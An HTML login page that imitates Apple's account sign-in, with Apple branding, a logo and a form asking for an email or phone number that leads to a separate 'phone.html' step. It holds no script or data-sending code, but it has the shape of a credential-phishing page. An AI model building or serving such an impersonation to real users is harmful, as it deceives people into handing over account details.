<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Apple Account Login</title>
    <link rel="stylesheet" href="../CSS/login.css">
</head>
<body>
    <div class="header">
        <div class="header-left">
            <a href="home.html"><h1>Apple Account</h1></a>
        </div>
        <div class="header-right">
            <a href="login.html">Sign In</a>
            <a href="signup.html">Create Your Apple Account</a>
            <a href="faq.html">FAQ</a>
        </div>
    </div>

    <div class="login-container">
        <img src="../Images/Website-main.PNG" alt="Apple Logo" class="apple-logo">
        <h2>Apple Account</h2>
        <p>Manage your Apple Account</p>

        <form id="loginForm" action="phone.html" method="GET">
            <input type="text" id="email" placeholder="Email or Phone Number" required>
            <button type="submit" class="submit-btn">&#x27A4;</button>
        </form>

        <div class="remember-me">
            <input type="checkbox" id="remember">
            <label for="remember">Remember me</label>
        </div>

        <a href="#" class="forgot-password">Forgotten your password?</a>
    </div>
</body>
</html>
